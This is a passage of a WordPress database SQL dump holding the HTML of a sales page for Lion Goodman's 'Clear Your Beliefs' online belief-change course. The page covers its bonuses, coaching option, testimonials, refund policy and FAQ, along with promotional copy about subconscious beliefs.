/></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<h3 class="widget-title">CYB banner header</h3>			 <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'p', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:51:19', '2015-05-12 17:51:19', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2163, 2, '2015-05-12 12:49:28', '2015-05-12 17:49:28', '<h3 class="widget-title">CYB banner header</h3>			 <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<h3 class="widget-title">Video Clear Your Beliefs</h3><p>&lt;center&gt;&lt;div class=''embed-container''&gt;     &lt;iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;/center&gt;</p><h3 class="widget-title">Red quote</h3>			<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h3 class="widget-title">Bullets</h3><p>&lt;div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"&gt;&lt;h2&gt;The &lt;em&gt;Clear Your Beliefs&lt;/em&gt; Program empowers you to...&lt;/h2&gt;&lt;ul style="margin-left: 25px;"&gt;    &lt;li&gt;Release pain and hurts from the past&lt;/li&gt;    &lt;li&gt;Open to deeper, more profound love&lt;/li&gt;    &lt;li&gt;Recognize your true spiritual nature&lt;/li&gt;    &lt;li&gt;Become more calm and less reactive&lt;/li&gt;    &lt;li&gt;Rediscover the source of your personal power&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;    &lt;li&gt;Clear whatever stops you from taking action&lt;/li&gt;    &lt;li&gt;Open yourself to new possibilities of success&lt;/li&gt;    &lt;li&gt;Eliminate blocks and barriers easily&lt;/li&gt;    &lt;li&gt;Discover your true purpose&lt;/li&gt;    &lt;li&gt;Express your true magnificence&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;How and Why It Works So Well&lt;/h2&gt;&lt;ul style="margin-left: 26px;"&gt;    &lt;li&gt;Beliefs are the major cause of unhappiness, upsets, and limitations.&lt;/li&gt;    &lt;li&gt;The &lt;em&gt;Clear Your Beliefs Program&lt;/em&gt; eliminates beliefs at the core of the psyche.&lt;/li&gt;    &lt;li&gt;The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.&lt;/li&gt;    &lt;li&gt;You''re in charge – you decide what you want to believe, and how far you want to go.&lt;/li&gt;    &lt;li&gt;The program guides you, gently, step-by-step, through the entire process of deleting beliefs.&lt;/li&gt;    &lt;li&gt;Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: 